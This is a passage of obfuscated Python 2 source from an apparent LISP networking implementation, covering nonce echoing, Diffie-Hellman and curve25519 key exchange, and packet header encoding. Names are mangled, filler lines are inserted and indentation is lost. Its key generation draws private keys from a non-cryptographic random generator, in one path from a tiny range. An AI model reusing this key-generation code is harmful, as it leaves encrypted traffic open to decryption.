if 30 - 30: Oo0Ooo + Ii1I % i11iIiiIii * i1IIi + I1IiiI % OOooOOo
if 30 - 30: i11iIiiIii * Oo0Ooo . II111iiii + I1ii11iIi11i / o0oOOo0O0Ooo % I1Ii111
if 78 - 78: I1ii11iIi11i + OoooooooOO - I1IiiI * OoOoOO00 * iII111i
if 7 - 7: OOooOOo . IiII . I1Ii111 / Ii1I / Oo0Ooo
if 83 - 83: I11i / Oo0Ooo
if 23 - 23: iIii1I11I1II1
self . last_request_nonce_sent = lisp_get_timestamp ( )
return ( o0OOO | 0x80000000 )
if 10 - 10: I11i - o0oOOo0O0Ooo % OoooooooOO - I1ii11iIi11i
if 64 - 64: OoO0O00 / I1IiiI
def request_nonce_timeout ( self ) :
if ( self . request_nonce_sent == None ) : return ( False )
if ( self . request_nonce_sent == self . echo_nonce_rcvd ) : return ( False )
if 23 - 23: I11i * I1Ii111 * o0oOOo0O0Ooo - I1IiiI % OoOoOO00 + o0oOOo0O0Ooo
Ooo0o0oo0 = time . time ( ) - self . last_request_nonce_sent
I1ii11ii1iiI = self . last_echo_nonce_rcvd
return ( Ooo0o0oo0 >= LISP_NONCE_ECHO_INTERVAL and I1ii11ii1iiI == None )
if 93 - 93: OoOoOO00 + I11i
if 27 - 27: iIii1I11I1II1 * I11i
def recently_requested ( self ) :
I1ii11ii1iiI = self . last_request_nonce_sent
if ( I1ii11ii1iiI == None ) : return ( False )
if 42 - 42: oO0o
Ooo0o0oo0 = time . time ( ) - I1ii11ii1iiI
return ( Ooo0o0oo0 <= LISP_NONCE_ECHO_INTERVAL )
if 22 - 22: iIii1I11I1II1 % I1IiiI . O0
if 13 - 13: II111iiii % i1IIi - OoOoOO00 + iII111i
def recently_echoed ( self ) :
if ( self . request_nonce_sent == None ) : return ( True )
if 59 - 59: OoooooooOO + I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 . I1IiiI
if 42 - 42: I1Ii111
if 70 - 70: o0oOOo0O0Ooo / I11i + oO0o % I1IiiI % Oo0Ooo + OoO0O00
if 80 - 80: OOooOOo
I1ii11ii1iiI = self . last_good_echo_nonce_rcvd
if ( I1ii11ii1iiI == None ) : I1ii11ii1iiI = 0
Ooo0o0oo0 = time . time ( ) - I1ii11ii1iiI
if ( Ooo0o0oo0 <= LISP_NONCE_ECHO_INTERVAL ) : return ( True )
if 12 - 12: Ii1I
if 2 - 2: OoooooooOO
if 100 - 100: Oo0Ooo / O0 * i11iIiiIii * OoooooooOO
if 46 - 46: O0 % OoooooooOO
if 22 - 22: iII111i + OoooooooOO - OoOoOO00 - OoO0O00 * I1Ii111 - oO0o
if 99 - 99: ooOoO0o / I1IiiI . Ii1I - Ii1I * I1IiiI
I1ii11ii1iiI = self . last_new_request_nonce_sent
if ( I1ii11ii1iiI == None ) : I1ii11ii1iiI = 0
Ooo0o0oo0 = time . time ( ) - I1ii11ii1iiI
return ( Ooo0o0oo0 <= LISP_NONCE_ECHO_INTERVAL )
if 24 - 24: I11i * OoO0O00 - oO0o / iIii1I11I1II1 - Oo0Ooo . OOooOOo
if 2 - 2: ooOoO0o - O0 - I1ii11iIi11i / I11i * OoOoOO00
def change_state ( self , rloc ) :
if ( rloc . up_state ( ) and self . recently_echoed ( ) == False ) :
III1II = bold ( "down" , False )
O0O00000o = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
lprint ( "Take {} {}, last good echo: {}" . format ( red ( self . rloc_str , False ) , III1II , O0O00000o ) )
if 53 - 53: Ii1I
rloc . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc . last_state_change = lisp_get_timestamp ( )
return
if 58 - 58: iIii1I11I1II1 - II111iiii - IiII % I1ii11iIi11i
if 80 - 80: IiII * iII111i . i1IIi % Ii1I % I1ii11iIi11i + ooOoO0o
if ( rloc . no_echoed_nonce_state ( ) == False ) : return
if 6 - 6: I1ii11iIi11i . oO0o . OoO0O00 + IiII
if ( self . recently_requested ( ) == False ) :
oO0oo0O0OOOo0 = bold ( "up" , False )
lprint ( "Bring {} {}, retry request-nonce mode" . format ( red ( self . rloc_str , False ) , oO0oo0O0OOOo0 ) )
if 29 - 29: I1IiiI
rloc . state = LISP_RLOC_UP_STATE
rloc . last_state_change = lisp_get_timestamp ( )
if 41 - 41: I1Ii111 * OoO0O00 - iII111i . Ii1I
if 41 - 41: iIii1I11I1II1 - O0 - I1ii11iIi11i - oO0o + I1Ii111
if 22 - 22: O0 % IiII % iII111i % I1IiiI
def print_echo_nonce ( self ) :
I11 = lisp_print_elapsed ( self . last_request_nonce_sent )
i11i111i1 = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
if 1 - 1: oO0o - Oo0Ooo * iIii1I11I1II1 * Oo0Ooo * i1IIi
i11i1IiIi = lisp_print_elapsed ( self . last_echo_nonce_sent )
ooOoOoOOOo = lisp_print_elapsed ( self . last_request_nonce_rcvd )
OO0o0OO0 = space ( 4 )
if 73 - 73: i11iIiiIii / OoOoOO00
oOOO = "Nonce-Echoing:\n"
oOOO += ( "{}Last request-nonce sent: {}\n{}Last echo-nonce " + "received: {}\n" ) . format ( OO0o0OO0 , I11 , OO0o0OO0 , i11i111i1 )
if 45 - 45: I11i . OoO0O00
oOOO += ( "{}Last request-nonce received: {}\n{}Last echo-nonce " + "sent: {}" ) . format ( OO0o0OO0 , ooOoOoOOOo , OO0o0OO0 , i11i1IiIi )
if 14 - 14: OOooOOo * I1IiiI - I1ii11iIi11i
if 10 - 10: iII111i % I1Ii111 * I1ii11iIi11i * O0 * i11iIiiIii % I1Ii111
return ( oOOO )
if 68 - 68: OoooooooOO * OoOoOO00
if 9 - 9: I1Ii111
if 36 - 36: I1Ii111 / OoOoOO00 + OoOoOO00 * ooOoO0o / OOooOOo * O0
if 17 - 17: OoO0O00 / ooOoO0o % I1IiiI
if 47 - 47: Oo0Ooo * OoO0O00 / o0oOOo0O0Ooo * I1IiiI
if 60 - 60: I1ii11iIi11i / IiII . i11iIiiIii / OoO0O00 % II111iiii
if 6 - 6: iII111i % o0oOOo0O0Ooo + I1Ii111
if 91 - 91: o0oOOo0O0Ooo + O0 * oO0o * IiII * I1ii11iIi11i
if 83 - 83: OoooooooOO
class lisp_keys ( ) :
def __init__ ( self , key_id , do_curve = True , do_chacha = use_chacha ,
do_poly = use_poly ) :
self . uptime = lisp_get_timestamp ( )
self . last_rekey = None
self . rekey_count = 0
self . use_count = 0
self . key_id = key_id
self . cipher_suite = LISP_CS_1024
self . dh_g_value = LISP_CS_1024_G
self . dh_p_value = LISP_CS_1024_P
self . curve25519 = None
self . cipher_suite_string = ""
if ( do_curve ) :
if ( do_chacha ) :
self . cipher_suite = LISP_CS_25519_CHACHA
self . cipher_suite_string = "chacha"
elif ( os . getenv ( "LISP_USE_AES_GCM" ) != None ) :
self . cipher_suite = LISP_CS_25519_GCM
self . cipher_suite_string = "aes-gcm"
else :
self . cipher_suite = LISP_CS_25519_CBC
self . cipher_suite_string = "aes-cbc"
if 52 - 52: o0oOOo0O0Ooo / OoOoOO00 % oO0o % OoO0O00 / IiII % o0oOOo0O0Ooo
self . local_private_key = random . randint ( 0 , 2 ** 128 - 1 )
o0Oo = lisp_hex_string ( self . local_private_key ) . zfill ( 32 )
self . curve25519 = curve25519 . Private ( o0Oo )
else :
self . local_private_key = random . randint ( 0 , 0x1fff )
if 88 - 88: OOooOOo / i11iIiiIii / Ii1I / i11iIiiIii * I1ii11iIi11i % I11i
self . local_public_key = self . compute_public_key ( )
self . remote_public_key = None
self . shared_key = None
self . encrypt_key = None
self . icv_key = None
self . icv = poly1305 if do_poly else hashlib . sha256
self . iv = None
self . get_iv ( )
self . do_poly = do_poly
if 43 - 43: OoOoOO00 * OoO0O00 % i1IIi * Ii1I + iIii1I11I1II1
if 80 - 80: o0oOOo0O0Ooo . iII111i . OoooooooOO
def copy_keypair ( self , key ) :
self . local_private_key = key . local_private_key
self . local_public_key = key . local_public_key
self . curve25519 = key . curve25519
if 63 - 63: ooOoO0o . OOooOOo
if 66 - 66: I1IiiI
def get_iv ( self ) :
if ( self . iv == None ) :
self . iv = random . randint ( 0 , LISP_16_128_MASK )
else :
self . iv += 1
if 99 - 99: OoO0O00 % O0 . I1Ii111 - I1ii11iIi11i . Oo0Ooo / OoOoOO00
OO000OOOo0Oo = self . iv
if ( self . cipher_suite == LISP_CS_25519_CHACHA ) :
OO000OOOo0Oo = struct . pack ( "Q" , OO000OOOo0Oo & LISP_8_64_MASK )
elif ( self . cipher_suite == LISP_CS_25519_GCM ) :
o0oOOoOoo = struct . pack ( "I" , ( OO000OOOo0Oo >> 64 ) & LISP_4_32_MASK )
ooO0O = struct . pack ( "Q" , OO000OOOo0Oo & LISP_8_64_MASK )
OO000OOOo0Oo = o0oOOoOoo + ooO0O
else :
OO000OOOo0Oo = struct . pack ( "QQ" , OO000OOOo0Oo >> 64 , OO000OOOo0Oo & LISP_8_64_MASK )
return ( OO000OOOo0Oo )
if 55 - 55: OOooOOo - II111iiii - IiII . I11i + oO0o - oO0o
if 29 - 29: OoOoOO00 - I1Ii111 % OOooOOo
def key_length ( self , key ) :
if ( type ( key ) != str ) : key = self . normalize_pub_key ( key )
return ( len ( key ) / 2 )
if 45 - 45: IiII / Oo0Ooo + OoooooooOO
if 77 - 77: oO0o . Ii1I / O0 * oO0o
def print_key ( self , key ) :
O0OoOO = self . normalize_pub_key ( key )
return ( "0x{}...{}({})" . format ( O0OoOO [ 0 : 4 ] , O0OoOO [ - 4 : : ] , self . key_length ( O0OoOO ) ) )
if 98 - 98: Oo0Ooo - oO0o . I1Ii111
if 51 - 51: iII111i . I1ii11iIi11i / I11i + o0oOOo0O0Ooo % OOooOOo
def normalize_pub_key ( self , key ) :
if ( type ( key ) == str ) :
if ( self . curve25519 ) : return ( binascii . hexlify ( key ) )
return ( key )
if 1 - 1: Ii1I % OOooOOo + OOooOOo * IiII
key = lisp_hex_string ( key ) . zfill ( 256 )
return ( key )
if 76 - 76: I1IiiI % i11iIiiIii + OOooOOo
if 17 - 17: I11i / II111iiii * o0oOOo0O0Ooo / Oo0Ooo + iII111i . oO0o
def print_keys ( self , do_bold = True ) :
IIi1I1 = bold ( "local-key: " , False ) if do_bold else "local-key: "
if ( self . local_public_key == None ) :
IIi1I1 += "none"
else :
IIi1I1 += self . print_key ( self . local_public_key )
if 19 - 19: OOooOOo * I11i
I1I111iIiI = bold ( "remote-key: " , False ) if do_bold else "remote-key: "
if ( self . remote_public_key == None ) :
I1I111iIiI += "none"
else :
I1I111iIiI += self . print_key ( self . remote_public_key )
if 85 - 85: i1IIi % o0oOOo0O0Ooo * I1ii11iIi11i * OoO0O00 . II111iiii
O000 = "ECDH" if ( self . curve25519 ) else "DH"
I1i1i1 = self . cipher_suite
return ( "{} cipher-suite: {}, {}, {}" . format ( O000 , I1i1i1 , IIi1I1 , I1I111iIiI ) )
if 35 - 35: iIii1I11I1II1 % I1Ii111 * I11i . Oo0Ooo
if 3 - 3: ooOoO0o - I1ii11iIi11i * I1IiiI . OoOoOO00
def compare_keys ( self , keys ) :
if ( self . dh_g_value != keys . dh_g_value ) : return ( False )
if ( self . dh_p_value != keys . dh_p_value ) : return ( False )
if ( self . remote_public_key != keys . remote_public_key ) : return ( False )
return ( True )
if 69 - 69: OoooooooOO / iIii1I11I1II1 - o0oOOo0O0Ooo % I1Ii111 - iIii1I11I1II1
if 49 - 49: o0oOOo0O0Ooo . I1ii11iIi11i % II111iiii
def compute_public_key ( self ) :
if ( self . curve25519 ) : return ( self . curve25519 . get_public ( ) . public )
if 4 - 4: I1IiiI / OoOoOO00 / I1IiiI / I11i . IiII + iII111i
o0Oo = self . local_private_key
i11ii = self . dh_g_value
IiI1i1i1 = self . dh_p_value
return ( int ( ( i11ii ** o0Oo ) % IiI1i1i1 ) )
if 70 - 70: ooOoO0o . i11iIiiIii % OoOoOO00 + oO0o
if 95 - 95: I1ii11iIi11i
def compute_shared_key ( self , ed , print_shared = False ) :
o0Oo = self . local_private_key
iiIii1I1Ii = self . remote_public_key
if 14 - 14: iII111i % OoO0O00
iI1IIiiIII1 = bold ( "Compute {} shared-key" . format ( ed ) , False )
lprint ( "{}, key-material: {}" . format ( iI1IIiiIII1 , self . print_keys ( ) ) )
if 67 - 67: I1ii11iIi11i + Ii1I * I11i / oO0o
if ( self . curve25519 ) :
i111Iii11i1Ii = curve25519 . Public ( iiIii1I1Ii )
self . shared_key = self . curve25519 . get_shared_key ( i111Iii11i1Ii )
else :
IiI1i1i1 = self . dh_p_value
self . shared_key = ( iiIii1I1Ii ** o0Oo ) % IiI1i1i1
if 65 - 65: iIii1I11I1II1 * IiII
if 89 - 89: IiII % i11iIiiIii . i11iIiiIii + oO0o / I1ii11iIi11i
if 19 - 19: I1IiiI
if 86 - 86: I1ii11iIi11i + OoOoOO00 * IiII + ooOoO0o
if 23 - 23: OoO0O00 - oO0o * iIii1I11I1II1
if 1 - 1: I11i - Oo0Ooo / i1IIi
if 96 - 96: OoooooooOO % iII111i - OoooooooOO % O0
if ( print_shared ) :
O0OoOO = self . print_key ( self . shared_key )
lprint ( "Computed shared-key: {}" . format ( O0OoOO ) )
if 21 - 21: iII111i
if 1 - 1: Oo0Ooo . i11iIiiIii
if 9 - 9: OoooooooOO / I11i
if 47 - 47: OoooooooOO
if 48 - 48: OoOoOO00 . IiII % I1IiiI + I11i
self . compute_encrypt_icv_keys ( )
if 37 - 37: Oo0Ooo + I1Ii111 * oO0o / o0oOOo0O0Ooo
if 78 - 78: IiII + I11i - o0oOOo0O0Ooo + OoO0O00 / iIii1I11I1II1
if 47 - 47: OOooOOo
if 20 - 20: I1Ii111 % ooOoO0o - I1Ii111 * OoooooooOO / I1ii11iIi11i
self . rekey_count += 1
self . last_rekey = lisp_get_timestamp ( )
if 57 - 57: IiII % I11i * OOooOOo % I1ii11iIi11i
if 65 - 65: i1IIi - OoooooooOO
def compute_encrypt_icv_keys ( self ) :
OO0o = hashlib . sha256
if ( self . curve25519 ) :
oOO00o0 = self . shared_key
else :
oOO00o0 = lisp_hex_string ( self . shared_key )
if 29 - 29: II111iiii - iII111i / oO0o % OoooooooOO % iII111i + IiII
if 44 - 44: O0 / O0
if 25 - 25: o0oOOo0O0Ooo + iIii1I11I1II1 + IiII + I1ii11iIi11i / I1Ii111 - i1IIi
if 15 - 15: O0 % Oo0Ooo % IiII % OoooooooOO - IiII
if 27 - 27: I1Ii111 - o0oOOo0O0Ooo * I1ii11iIi11i - I1IiiI
IIi1I1 = self . local_public_key
if ( type ( IIi1I1 ) != long ) : IIi1I1 = int ( binascii . hexlify ( IIi1I1 ) , 16 )
I1I111iIiI = self . remote_public_key
if ( type ( I1I111iIiI ) != long ) : I1I111iIiI = int ( binascii . hexlify ( I1I111iIiI ) , 16 )
IIIiIIi111 = "0001" + "lisp-crypto" + lisp_hex_string ( IIi1I1 ^ I1I111iIiI ) + "0100"
if 77 - 77: I1IiiI / I1Ii111
OOoo0oo000oo = hmac . new ( IIIiIIi111 , oOO00o0 , OO0o ) . hexdigest ( )
OOoo0oo000oo = int ( OOoo0oo000oo , 16 )
if 58 - 58: I1ii11iIi11i % i11iIiiIii + OoOoOO00 / I11i - OoooooooOO
if 62 - 62: OoO0O00 . OoOoOO00
if 22 - 22: ooOoO0o . i11iIiiIii . OoooooooOO . i1IIi
if 12 - 12: OoOoOO00 % OOooOOo + oO0o . O0 % iIii1I11I1II1
ii1I = ( OOoo0oo000oo >> 128 ) & LISP_16_128_MASK
O00oO0oOOOOOO = OOoo0oo000oo & LISP_16_128_MASK
self . encrypt_key = lisp_hex_string ( ii1I ) . zfill ( 32 )
Oo0ooo00OoO = 32 if self . do_poly else 40
self . icv_key = lisp_hex_string ( O00oO0oOOOOOO ) . zfill ( Oo0ooo00OoO )
if 1 - 1: OoooooooOO * iIii1I11I1II1 / I1ii11iIi11i * I11i
if 37 - 37: iII111i % I11i . iII111i - OOooOOo / iIii1I11I1II1 - OOooOOo
def do_icv ( self , packet , nonce ) :
if ( self . icv_key == None ) : return ( "" )
if ( self . do_poly ) :
i1i = self . icv . poly1305aes
iiIi1i = self . icv . binascii . hexlify
nonce = iiIi1i ( nonce )
I1i11IIiiIiI = i1i ( self . encrypt_key , self . icv_key , nonce , packet )
I1i11IIiiIiI = iiIi1i ( I1i11IIiiIiI )
else :
o0Oo = binascii . unhexlify ( self . icv_key )
I1i11IIiiIiI = hmac . new ( o0Oo , packet , self . icv ) . hexdigest ( )
I1i11IIiiIiI = I1i11IIiiIiI [ 0 : 40 ]
if 7 - 7: OoO0O00 * i11iIiiIii * iIii1I11I1II1 / OOooOOo / I1Ii111
return ( I1i11IIiiIiI )
if 35 - 35: iII111i * OOooOOo
if 65 - 65: II111iiii % i1IIi
def add_key_by_nonce ( self , nonce ) :
if ( lisp_crypto_keys_by_nonce . has_key ( nonce ) == False ) :
lisp_crypto_keys_by_nonce [ nonce ] = [ None , None , None , None ]
if 13 - 13: OoO0O00 * I1Ii111 + Oo0Ooo - IiII
lisp_crypto_keys_by_nonce [ nonce ] [ self . key_id ] = self
if 31 - 31: OoO0O00
if 68 - 68: OoO0O00 + i1IIi / iIii1I11I1II1 + II111iiii * iIii1I11I1II1 + I1ii11iIi11i
def delete_key_by_nonce ( self , nonce ) :
if ( lisp_crypto_keys_by_nonce . has_key ( nonce ) == False ) : return
lisp_crypto_keys_by_nonce . pop ( nonce )
if 77 - 77: i11iIiiIii - I1Ii111 . I1ii11iIi11i % Oo0Ooo . Ii1I
if 9 - 9: o0oOOo0O0Ooo
def add_key_by_rloc ( self , addr_str , encap ) :
O0Ooo000Ooo = lisp_crypto_keys_by_rloc_encap if encap else lisp_crypto_keys_by_rloc_decap
if 46 - 46: i1IIi + O0
if 5 - 5: o0oOOo0O0Ooo + I1IiiI / OoooooooOO % i11iIiiIii % OoooooooOO - o0oOOo0O0Ooo
if ( O0Ooo000Ooo . has_key ( addr_str ) == False ) :
O0Ooo000Ooo [ addr_str ] = [ None , None , None , None ]
if 53 - 53: OoO0O00 + i11iIiiIii / iIii1I11I1II1
O0Ooo000Ooo [ addr_str ] [ self . key_id ] = self
if 1 - 1: IiII % i1IIi
if 41 - 41: OoO0O00 * OoO0O00 / iII111i + I1ii11iIi11i . o0oOOo0O0Ooo
if 84 - 84: i11iIiiIii + OoO0O00 * I1IiiI + I1ii11iIi11i / Ii1I
if 80 - 80: I1ii11iIi11i
if 67 - 67: II111iiii
if ( encap == False ) :
lisp_write_ipc_decap_key ( addr_str , O0Ooo000Ooo [ addr_str ] )
if 2 - 2: o0oOOo0O0Ooo - O0 * Ii1I % IiII
if 64 - 64: i1IIi . ooOoO0o
if 7 - 7: oO0o . iII111i - iII111i / I1Ii111 % Oo0Ooo
def encode_lcaf ( self , rloc_addr ) :
OOoO00OOo = self . normalize_pub_key ( self . local_public_key )
iii = self . key_length ( OOoO00OOo )
iiiii = ( 6 + iii + 2 )
if ( rloc_addr != None ) : iiiii += rloc_addr . addr_length ( )
if 74 - 74: I1ii11iIi11i % I1Ii111 - OoO0O00 * I11i . OoooooooOO * OoO0O00
IiiiIi1iiii11 = struct . pack ( "HBBBBHBB" , socket . htons ( LISP_AFI_LCAF ) , 0 , 0 ,
LISP_LCAF_SECURITY_TYPE , 0 , socket . htons ( iiiii ) , 1 , 0 )
if 99 - 99: OoOoOO00 . iII111i - OoooooooOO - O0
if 6 - 6: OOooOOo
if 3 - 3: O0 - I1Ii111 * Ii1I * OOooOOo / Ii1I
if 58 - 58: Ii1I * iIii1I11I1II1 + ooOoO0o . ooOoO0o
if 74 - 74: ooOoO0o - o0oOOo0O0Ooo * IiII % ooOoO0o
if 93 - 93: iIii1I11I1II1 / OoOoOO00 % Oo0Ooo * I1Ii111 - OoO0O00 - o0oOOo0O0Ooo
I1i1i1 = self . cipher_suite
IiiiIi1iiii11 += struct . pack ( "BBH" , I1i1i1 , 0 , socket . htons ( iii ) )
if 44 - 44: OoooooooOO
if 82 - 82: OoOoOO00 . OoOoOO00
if 10 - 10: Oo0Ooo * I1ii11iIi11i . oO0o . OoooooooOO . OOooOOo * I1ii11iIi11i
if 80 - 80: I1Ii111 + I11i . I1Ii111 + OOooOOo
for iIi1I1 in range ( 0 , iii * 2 , 16 ) :
o0Oo = int ( OOoO00OOo [ iIi1I1 : iIi1I1 + 16 ] , 16 )
IiiiIi1iiii11 += struct . pack ( "Q" , byte_swap_64 ( o0Oo ) )
if 85 - 85: i11iIiiIii . I11i + Ii1I / Ii1I
if 43 - 43: IiII . OoooooooOO - II111iiii
if 90 - 90: I1IiiI - iIii1I11I1II1 + I1ii11iIi11i * OOooOOo * oO0o
if 19 - 19: I1Ii111 * II111iiii % Oo0Ooo - i1IIi
if 27 - 27: OoOoOO00 . O0 / I1ii11iIi11i . iIii1I11I1II1
if ( rloc_addr ) :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( rloc_addr . afi ) )
IiiiIi1iiii11 += rloc_addr . pack_address ( )
if 15 - 15: Ii1I + OoO0O00 % iIii1I11I1II1 - I1ii11iIi11i - i1IIi % o0oOOo0O0Ooo
return ( IiiiIi1iiii11 )
if 54 - 54: IiII - II111iiii . ooOoO0o + Ii1I
if 45 - 45: oO0o + II111iiii . iII111i / I1ii11iIi11i
def decode_lcaf ( self , packet , lcaf_len ) :
if 76 - 76: Ii1I + iII111i - IiII * iIii1I11I1II1 % i1IIi
if 72 - 72: ooOoO0o + II111iiii . O0 - iII111i / OoooooooOO . I1Ii111
if 28 - 28: iIii1I11I1II1 . O0
if 32 - 32: OoooooooOO
if ( lcaf_len == 0 ) :
O0O00Oo = "HHBBH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 29 - 29: I1ii11iIi11i
IiiiII , iI111iiI1II , OOOoooO000O0 , iI111iiI1II , lcaf_len = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 63 - 63: oO0o - iII111i - ooOoO0o / oO0o + I1Ii111 + Oo0Ooo
if 32 - 32: I1IiiI . I1IiiI / iIii1I11I1II1 - I11i - O0 % OOooOOo
if ( OOOoooO000O0 != LISP_LCAF_SECURITY_TYPE ) :
packet = packet [ lcaf_len + 6 : : ]
return ( packet )
if 48 - 48: Oo0Ooo % Oo0Ooo % O0
lcaf_len = socket . ntohs ( lcaf_len )
packet = packet [ IiIii1i : : ]
if 8 - 8: iII111i . Ii1I - i1IIi % OoO0O00 / I11i
if 13 - 13: Oo0Ooo / OoOoOO00 . I1ii11iIi11i . OOooOOo
if 31 - 31: o0oOOo0O0Ooo
if 59 - 59: Oo0Ooo / Oo0Ooo
if 87 - 87: I1ii11iIi11i % OoOoOO00 + Ii1I . i11iIiiIii / Ii1I
if 32 - 32: Ii1I + IiII + I1ii11iIi11i
OOOoooO000O0 = LISP_LCAF_SECURITY_TYPE
O0O00Oo = "BBBBH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 79 - 79: i1IIi / Ii1I
o0O , iI111iiI1II , I1i1i1 , iI111iiI1II , iii = struct . unpack ( O0O00Oo ,
packet [ : IiIii1i ] )
if 80 - 80: IiII % OoO0O00 / O0 % I1IiiI + i1IIi - O0
if 70 - 70: OoooooooOO . II111iiii / Ii1I * IiII + OOooOOo
if 48 - 48: oO0o % iIii1I11I1II1 + OoooooooOO
if 71 - 71: Oo0Ooo
if 98 - 98: o0oOOo0O0Ooo * Oo0Ooo - Ii1I . ooOoO0o
if 2 - 2: Oo0Ooo - ooOoO0o % iIii1I11I1II1
packet = packet [ IiIii1i : : ]
iii = socket . ntohs ( iii )
if ( len ( packet ) < iii ) : return ( None )
if 88 - 88: I1Ii111 - OoO0O00
if 79 - 79: iII111i
if 45 - 45: II111iiii + iII111i . I11i . O0 * i1IIi - Ii1I
if 48 - 48: I1ii11iIi11i + Oo0Ooo
o0OOoOoo = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM , LISP_CS_25519_CHACHA ,
LISP_CS_1024 ]
if ( I1i1i1 not in o0OOoOoo ) :
lprint ( "Cipher-suites {} supported, received {}" . format ( o0OOoOoo ,
I1i1i1 ) )
packet = packet [ iii : : ]
return ( packet )
if 56 - 56: IiII - Ii1I + i11iIiiIii * OoO0O00 % I1IiiI
if 37 - 37: iIii1I11I1II1 + IiII / I1Ii111 . OoooooooOO
self . cipher_suite = I1i1i1
if 72 - 72: oO0o % ooOoO0o % OOooOOo
if 63 - 63: OoO0O00 . Ii1I % II111iiii / I11i - OoOoOO00
if 4 - 4: Oo0Ooo - O0 / I11i + O0 - oO0o * Oo0Ooo
if 25 - 25: I1IiiI
if 64 - 64: oO0o
OOoO00OOo = 0
for iIi1I1 in range ( 0 , iii , 8 ) :
o0Oo = byte_swap_64 ( struct . unpack ( "Q" , packet [ iIi1I1 : iIi1I1 + 8 ] ) [ 0 ] )
OOoO00OOo <<= 64
OOoO00OOo |= o0Oo
if 80 - 80: o0oOOo0O0Ooo % iIii1I11I1II1
self . remote_public_key = OOoO00OOo
if 63 - 63: IiII * i11iIiiIii
if 86 - 86: I11i % I11i - OoOoOO00 + I1Ii111 / I1IiiI * OoooooooOO
if 26 - 26: II111iiii * iII111i + o0oOOo0O0Ooo / O0 + i1IIi - I11i
if 56 - 56: OOooOOo
if 76 - 76: i1IIi % iIii1I11I1II1 - o0oOOo0O0Ooo + IiII - I11i
if ( self . curve25519 ) :
o0Oo = lisp_hex_string ( self . remote_public_key )
o0Oo = o0Oo . zfill ( 64 )
OOOo00o = ""
for iIi1I1 in range ( 0 , len ( o0Oo ) , 2 ) :
OOOo00o += chr ( int ( o0Oo [ iIi1I1 : iIi1I1 + 2 ] , 16 ) )
if 100 - 100: iIii1I11I1II1 - OoOoOO00
self . remote_public_key = OOOo00o
if 28 - 28: Oo0Ooo . O0 . I11i
if 60 - 60: II111iiii + I1Ii111 / oO0o % OoooooooOO - i1IIi
packet = packet [ iii : : ]
return ( packet )
if 57 - 57: ooOoO0o
if 99 - 99: Oo0Ooo + I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
if 52 - 52: I1ii11iIi11i
if 93 - 93: iII111i . i11iIiiIii
if 24 - 24: OOooOOo . OoO0O00 + I1Ii111 . oO0o - I1ii11iIi11i % iII111i
if 49 - 49: O0 . Oo0Ooo / Ii1I
if 29 - 29: I1ii11iIi11i / oO0o * O0 - i11iIiiIii - OoO0O00 + Ii1I
if 86 - 86: I1IiiI / I1ii11iIi11i * Ii1I % i11iIiiIii
class lisp_thread ( ) :
def __init__ ( self , name ) :
self . thread_name = name
self . thread_number = - 1
self . number_of_pcap_threads = 0
self . number_of_worker_threads = 0
self . input_queue = Queue . Queue ( )
self . input_stats = lisp_stats ( )
self . lisp_packet = lisp_packet ( None )
if 20 - 20: iII111i . OoooooooOO + iII111i + ooOoO0o * I1ii11iIi11i
if 44 - 44: i11iIiiIii
if 69 - 69: OOooOOo * O0 + i11iIiiIii
if 65 - 65: O0 / iII111i . i1IIi * iII111i / iIii1I11I1II1 - oO0o
if 93 - 93: OoOoOO00 % i11iIiiIii - Ii1I % OoO0O00
if 55 - 55: o0oOOo0O0Ooo . I1ii11iIi11i
if 63 - 63: oO0o
if 79 - 79: I1ii11iIi11i - oO0o - o0oOOo0O0Ooo . OOooOOo
if 65 - 65: i11iIiiIii . OoO0O00 % iII111i + IiII - i11iIiiIii
if 60 - 60: I1Ii111
if 14 - 14: Oo0Ooo % oO0o * iII111i - i11iIiiIii / I1ii11iIi11i * i11iIiiIii
if 95 - 95: iIii1I11I1II1 + OoOoOO00 . I1IiiI + OoOoOO00 * I11i + OOooOOo
if 14 - 14: Ii1I - O0
if 68 - 68: II111iiii - I1ii11iIi11i - OoO0O00 * iIii1I11I1II1 / I1IiiI * I1ii11iIi11i
if 45 - 45: I1Ii111 * I11i / iIii1I11I1II1 / I1IiiI % II111iiii
if 49 - 49: Ii1I / iII111i . iII111i . iII111i + i11iIiiIii % I11i
if 7 - 7: IiII * ooOoO0o + OoOoOO00
if 22 - 22: iII111i
class lisp_control_header ( ) :
def __init__ ( self ) :
self . type = 0
self . record_count = 0
self . nonce = 0
self . rloc_probe = False
self . smr_bit = False
self . smr_invoked_bit = False
self . ddt_bit = False
self . to_etr = False
self . to_ms = False
self . info_reply = False
if 48 - 48: I1ii11iIi11i . I1IiiI
if 73 - 73: O0 . I1Ii111 - OoooooooOO % I11i % i1IIi
def decode ( self , packet ) :
O0O00Oo = "BBBBQ"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( False )
if 14 - 14: I1Ii111 + Ii1I * Oo0Ooo
iI11iI , O0o0ooo00o00 , IiiI , self . record_count , self . nonce = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 32 - 32: ooOoO0o
if 26 - 26: O0 * Ii1I - I1IiiI - iII111i / iIii1I11I1II1
self . type = iI11iI >> 4
if ( self . type == LISP_MAP_REQUEST ) :
self . smr_bit = True if ( iI11iI & 0x01 ) else False
self . rloc_probe = True if ( iI11iI & 0x02 ) else False
self . smr_invoked_bit = True if ( O0o0ooo00o00 & 0x40 ) else False
if 57 - 57: I1ii11iIi11i - OoO0O00 * iIii1I11I1II1
if ( self . type == LISP_ECM ) :
self . ddt_bit = True if ( iI11iI & 0x04 ) else False
self . to_etr = True if ( iI11iI & 0x02 ) else False
self . to_ms = True if ( iI11iI & 0x01 ) else False
if 26 - 26: OoO0O00 % ooOoO0o % o0oOOo0O0Ooo % OoOoOO00 . iII111i % O0
if ( self . type == LISP_NAT_INFO ) :
self . info_reply = True if ( iI11iI & 0x08 ) else False
if 91 - 91: II111iiii . Oo0Ooo . oO0o - OoooooooOO / OoOoOO00
return ( True )
